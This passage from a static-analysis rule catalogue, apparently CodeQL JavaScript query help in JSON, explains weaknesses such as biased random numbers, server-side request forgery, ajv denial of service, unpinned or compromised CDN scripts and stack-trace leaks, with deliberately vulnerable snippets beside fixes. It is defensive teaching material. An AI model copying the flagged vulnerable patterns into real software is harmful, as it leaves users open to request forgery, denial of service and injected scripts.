can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n    digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n    const byte = crypto.randomBytes(1)[0];\n    if (byte >= 250) {\n        continue;\n    }\n    digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n","markdown":"# Creating biased random numbers from a cryptographically secure source\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n    digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n    const byte = crypto.randomBytes(1)[0];\n    if (byte >= 250) {\n        continue;\n    }\n    digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n"},"properties":{"tags":["security","external/cwe/cwe-327"],"description":"Some mathematical operations on random numbers can cause bias in\n              the results and compromise security.","id":"js/biased-cryptographic-random","kind":"problem","name":"Creating biased random numbers from a cryptographically secure source","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/resource-exhaustion-from-deep-object-traversal","name":"js/resource-exhaustion-from-deep-object-traversal","shortDescription":{"text":"Resources exhaustion from deep object traversal"},"fullDescription":{"text":"Processing user-controlled object hierarchies inefficiently can lead to denial of service."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-400"],"description":"Processing user-controlled object hierarchies inefficiently can lead to denial of service.","id":"js/resource-exhaustion-from-deep-object-traversal","kind":"path-problem","name":"Resources exhaustion from deep object traversal","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/request-forgery","name":"js/request-forgery","shortDescription":{"text":"Server-side request forgery"},"fullDescription":{"text":"Making a network request with user-controlled data in the URL allows for request forgery attacks."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n    const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n    // BAD: `target` is controlled by the attacker\n    http.get('https://' + target + \".example.com/data/\", res => {\n        // process request response ...\n    });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n    const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n    let subdomain;\n    if (target === 'EU') {\n        subdomain = \"europe\"\n    } else {\n        subdomain = \"world\"\n    }\n\n    // GOOD: `subdomain` is controlled by the server\n    http.get('https://' + subdomain + \".example.com/data/\", res => {\n        // process request response ...\n    });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n","markdown":"# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n    const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n    // BAD: `target` is controlled by the attacker\n    http.get('https://' + target + \".example.com/data/\", res => {\n        // process request response ...\n    });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n    const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n    let subdomain;\n    if (target === 'EU') {\n        subdomain = \"europe\"\n    } else {\n        subdomain = \"world\"\n    }\n\n    // GOOD: `subdomain` is controlled by the server\n    http.get('https://' + subdomain + \".example.com/data/\", res => {\n        // process request response ...\n    });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n"},"properties":{"tags":["security","external/cwe/cwe-918"],"description":"Making a network request with user-controlled data in the URL allows for request forgery attacks.","id":"js/request-forgery","kind":"path-problem","name":"Server-side request forgery","precision":"high","problem.severity":"error","security-severity":"9.1"}},{"id":"js/functionality-from-untrusted-source","name":"js/functionality-from-untrusted-source","shortDescription":{"text":"Inclusion of functionality from an untrusted source"},"fullDescription":{"text":"Including functionality from an untrusted source may allow an attacker to control the functionality and execute arbitrary code."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity (SRI) checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\nA dynamic service cannot be easily used with SRI. Nevertheless, it is possible to list multiple acceptable SHA hashes in the `integrity` attribute, such as those for the content generated for major browers used by your users.\n\nSee the \\[\\`CUSTOMIZING.md\\`\\](https://github.com/github/codeql/blob/main/javascript/ql/src/Security/CWE-830/CUSTOMIZING.md) file in the source code for this query for information on how to extend the list of hostnames required to use SRI by this query.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n<html>\n    <head>\n        <title>jQuery demo</title>\n        <script src=\"http://code.jquery.com/jquery-3.6.0.slim.min.js\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n<html>\n    <head>\n        <title>jQuery demo</title>\n        <script src=\"https://code.jquery.com/jquery-3.6.0.slim.min.js\" integrity=\"sha256-u7e5khyithlIdTpu22PHhENmPcRdFiHRjhAuHcs05RI=\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n","markdown":"# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity (SRI) checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\nA dynamic service cannot be easily used with SRI. Nevertheless, it is possible to list multiple acceptable SHA hashes in the `integrity` attribute, such as those for the content generated for major browers used by your users.\n\nSee the \\[\\`CUSTOMIZING.md\\`\\](https://github.com/github/codeql/blob/main/javascript/ql/src/Security/CWE-830/CUSTOMIZING.md) file in the source code for this query for information on how to extend the list of hostnames required to use SRI by this query.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n<html>\n    <head>\n        <title>jQuery demo</title>\n        <script src=\"http://code.jquery.com/jquery-3.6.0.slim.min.js\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n<html>\n    <head>\n        <title>jQuery demo</title>\n        <script src=\"https://code.jquery.com/jquery-3.6.0.slim.min.js\" integrity=\"sha256-u7e5khyithlIdTpu22PHhENmPcRdFiHRjhAuHcs05RI=\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n"},"properties":{"tags":["security","external/cwe/cwe-830"],"description":"Including functionality from an untrusted source may allow\n              an attacker to control the functionality and execute arbitrary code.","id":"js/functionality-from-untrusted-source","kind":"problem","name":"Inclusion of functionality from an untrusted source","precision":"high","problem.severity":"warning","security-severity":"6.0"}},{"id":"js/functionality-from-untrusted-domain","name":"js/functionality-from-untrusted-domain","shortDescription":{"text":"Untrusted domain used in script or other content"},"fullDescription":{"text":"Using a resource from an untrusted or compromised domain makes your code vulnerable to receiving malicious code."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Untrusted domain used in script or other content\nContent Delivery Networks (CDNs) are used to deliver content to users quickly and efficiently. However, they can change hands or be operated by untrustworthy owners, risking the security of the sites that use them. Some CDN domains are operated by entities that have used CDNs to deliver malware, which this query identifies.\n\nFor example, `polyfill.io` was a popular JavaScript CDN, used to support new web browser standards on older browsers. In February 2024 the domain was sold, and in June 2024 it was publicised that the domain had been used to serve malicious scripts. It was taken down later in that month, leaving a window where sites that used the service could have been compromised. The same operator runs several other CDNs, undermining trust in those too.\n\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element) on a page, it is important to ensure that the received data is not malicious.\n\nEven when `https` is used, an untrustworthy operator might deliver malware.\n\nSee the \\[\\`CUSTOMIZING.md\\`\\](https://github.com/github/codeql/blob/main/javascript/ql/src/Security/CWE-830/CUSTOMIZING.md) file in the source code for this query for information on how to extend the list of untrusted domains used by this query.\n\n\n## Recommendation\nCarefully research the ownership of a Content Delivery Network (CDN) before using it in your application.\n\nIf you find code that originated from an untrusted domain in your application, you should review your logs to check for compromise.\n\nTo help mitigate the risk of including a script that could be compromised in the future, consider whether you need to use polyfill or another library at all. Modern browsers do not require a polyfill, and other popular libraries were made redundant by enhancements to HTML 5.\n\nIf you do need a polyfill service or library, move to using a CDN that you trust.\n\nWhen you use a `script` or `link` element, you should check for [subresource integrity (SRI)](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity), and pin to a hash of a version of the service that you can trust (for example, because you have audited it for security and unwanted features). A dynamic service cannot be easily used with SRI. Nevertheless, it is possible to list multiple acceptable SHA hashes in the `integrity` attribute, such as hashes for the content required for the major browsers used by your users.\n\nYou can also choose to self-host an uncompromised version of the service or library.\n\n\n## Example\nThe following example loads the Polyfill.io library from the `polyfill.io` CDN. This use was open to malicious scripts being served by the CDN.\n\n\n```html\n<html>\n    <head>\n        <title>Polyfill.io demo</title>\n        <script src=\"https://cdn.polyfill.io/v2/polyfill.min.js\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\nInstead, load the Polyfill library from a trusted CDN, as in the next example:\n\n\n```html\n<html>\n    <head>\n        <title>Polyfill demo - Cloudflare hosted with pinned version (but no integrity checking, since it is dynamically generated)</title>\n        <script src=\"https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?version=4.8.0\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\nIf you know which browsers are used by the majority of your users, you can list the hashes of the polyfills for those browsers:\n\n\n```html\n<html>\n    <head>\n        <title>Polyfill demo - Cloudflare hosted with pinned version (with integrity checking for a *very limited* browser set - just an example!)</title>\n        <script src=\"https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?version=4.8.0\" integrity=\"sha384-i0IGVuZBkKZqwXTD4CH4kcksIbFx7WKFMdxN8zUhLFHpLdELF0ym0jxa6UvLhW8/ sha384-3d4jRKquKl90C9aFG+eH4lPJmtbPHgACWHrp+VomFOxF8lzx2jxqeYkhpRg18UWC\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\n\n## References\n* Sansec: [Polyfill supply chain attack hits 100K+ sites](https://sansec.io/research/polyfill-supply-chain-attack)\n* Cloudflare: [Upgrade the web. Automatically. Delivers only the polyfills required by the user's web browser.](https://cdnjs.cloudflare.com/polyfill)\n* Fastly: [New options for Polyfill.io users](https://community.fastly.com/t/new-options-for-polyfill-io-users/2540)\n* Wikipedia: [Polyfill (programming)](https://en.wikipedia.org/wiki/Polyfill_(programming))\n* MDN Web Docs: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n","markdown":"# Untrusted domain used in script or other content\nContent Delivery Networks (CDNs) are used to deliver content to users quickly and efficiently. However, they can change hands or be operated by untrustworthy owners, risking the security of the sites that use them. Some CDN domains are operated by entities that have used CDNs to deliver malware, which this query identifies.\n\nFor example, `polyfill.io` was a popular JavaScript CDN, used to support new web browser standards on older browsers. In February 2024 the domain was sold, and in June 2024 it was publicised that the domain had been used to serve malicious scripts. It was taken down later in that month, leaving a window where sites that used the service could have been compromised. The same operator runs several other CDNs, undermining trust in those too.\n\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element) on a page, it is important to ensure that the received data is not malicious.\n\nEven when `https` is used, an untrustworthy operator might deliver malware.\n\nSee the \\[\\`CUSTOMIZING.md\\`\\](https://github.com/github/codeql/blob/main/javascript/ql/src/Security/CWE-830/CUSTOMIZING.md) file in the source code for this query for information on how to extend the list of untrusted domains used by this query.\n\n\n## Recommendation\nCarefully research the ownership of a Content Delivery Network (CDN) before using it in your application.\n\nIf you find code that originated from an untrusted domain in your application, you should review your logs to check for compromise.\n\nTo help mitigate the risk of including a script that could be compromised in the future, consider whether you need to use polyfill or another library at all. Modern browsers do not require a polyfill, and other popular libraries were made redundant by enhancements to HTML 5.\n\nIf you do need a polyfill service or library, move to using a CDN that you trust.\n\nWhen you use a `script` or `link` element, you should check for [subresource integrity (SRI)](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity), and pin to a hash of a version of the service that you can trust (for example, because you have audited it for security and unwanted features). A dynamic service cannot be easily used with SRI. Nevertheless, it is possible to list multiple acceptable SHA hashes in the `integrity` attribute, such as hashes for the content required for the major browsers used by your users.\n\nYou can also choose to self-host an uncompromised version of the service or library.\n\n\n## Example\nThe following example loads the Polyfill.io library from the `polyfill.io` CDN. This use was open to malicious scripts being served by the CDN.\n\n\n```html\n<html>\n    <head>\n        <title>Polyfill.io demo</title>\n        <script src=\"https://cdn.polyfill.io/v2/polyfill.min.js\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\nInstead, load the Polyfill library from a trusted CDN, as in the next example:\n\n\n```html\n<html>\n    <head>\n        <title>Polyfill demo - Cloudflare hosted with pinned version (but no integrity checking, since it is dynamically generated)</title>\n        <script src=\"https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?version=4.8.0\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\nIf you know which browsers are used by the majority of your users, you can list the hashes of the polyfills for those browsers:\n\n\n```html\n<html>\n    <head>\n        <title>Polyfill demo - Cloudflare hosted with pinned version (with integrity checking for a *very limited* browser set - just an example!)</title>\n        <script src=\"https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?version=4.8.0\" integrity=\"sha384-i0IGVuZBkKZqwXTD4CH4kcksIbFx7WKFMdxN8zUhLFHpLdELF0ym0jxa6UvLhW8/ sha384-3d4jRKquKl90C9aFG+eH4lPJmtbPHgACWHrp+VomFOxF8lzx2jxqeYkhpRg18UWC\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\n\n## References\n* Sansec: [Polyfill supply chain attack hits 100K+ sites](https://sansec.io/research/polyfill-supply-chain-attack)\n* Cloudflare: [Upgrade the web. Automatically. Delivers only the polyfills required by the user's web browser.](https://cdnjs.cloudflare.com/polyfill)\n* Fastly: [New options for Polyfill.io users](https://community.fastly.com/t/new-options-for-polyfill-io-users/2540)\n* Wikipedia: [Polyfill (programming)](https://en.wikipedia.org/wiki/Polyfill_(programming))\n* MDN Web Docs: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n"},"properties":{"tags":["security","external/cwe/cwe-830"],"description":"Using a resource from an untrusted or compromised domain makes your code vulnerable to receiving malicious code.","id":"js/functionality-from-untrusted-domain","kind":"problem","name":"Untrusted domain used in script or other content","precision":"high","problem.severity":"error","security-severity":"7.2"}},{"id":"js/stack-trace-exposure","name":"js/stack-trace-exposure","shortDescription":{"text":"Information exposure through a stack trace"},"fullDescription":{"text":"Propagating stack trace information to an external user can unintentionally reveal implementation details that are useful to an attacker for developing a subsequent exploit."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n  var body;\n  try {\n    body = handleRequest(req);\n  }\n  catch (err) {\n    res.statusCode = 500;\n    res.setHeader(\"Content-Type\", \"text/plain\");\n    res.end(err.stack); // NOT OK\n    return;\n  }\n  res.statusCode = 200;\n  res.setHeader(\"Content-Type\", \"application/json\");\n  res.setHeader(\"Content-Length\", body.length);\n  res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. That way, the developers can still access and use the error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n  var body;\n  try {\n    body = handleRequest(req);\n  }\n  catch (err) {\n    res.statusCode = 500;\n    res.setHeader(\"Content-Type\", \"text/plain\");\n    log(\"Exception occurred\", err.stack);\n    res.end(\"An exception occurred\"); // OK\n    return;\n  }\n  res.statusCode = 200;\n  res.setHeader(\"Content-Type\", \"application/json\");\n  res.setHeader(\"Content-Length\", body.length);\n  res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n","markdown":"# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n  var body;\n  try {\n    body = handleRequest(req);\n  }\n  catch (err) {\n    res.statusCode = 500;\n    res.setHeader(\"Content-Type\", \"text/plain\");\n    res.end(err.stack); // NOT OK\n    return;\n  }\n  res.statusCode = 200;\n  res.setHeader(\"Content-Type\", \"application/json\");\n  res.setHeader(\"Content-Length\", body.length);\n  res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. That way, the developers can still access and use the 